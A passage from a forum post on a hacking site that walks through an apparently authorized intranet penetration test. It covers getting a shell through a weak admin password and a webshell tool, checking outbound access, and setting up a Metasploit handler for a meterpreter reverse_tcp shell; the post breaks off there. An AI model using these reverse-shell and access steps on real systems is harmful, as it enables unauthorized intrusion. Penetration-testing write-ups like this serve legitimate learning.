Jump to content

Title: Practical explanation of intranet penetration ideas

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

0x00 Introduction

This test is a practical test. The test environment is part of the authorized project. The sensitive information content has been coded and is for discussion and learning only. Since I am also a novice in the intranet, some of the msf attack techniques I have used are also very basic. Please give me some advice.

0x01 Get shell

There is nothing to say about the Getshell process, it is nothing more than a simple background weak password upload and then the Ice Scorpion connects to getshell.

After obtaining the shell, the simulated terminal ping 8.8.8.8 has a return package, indicating that the server is interconnected with the external network.1049983-20220124162828824-2034753246.png

Since it is connected to the external network, you can try to directly use msf's exploit/multi/handler with the Ice Scorpion rebound shell to obtain the session

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost xxx.xxx.xxx.xxxx.

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.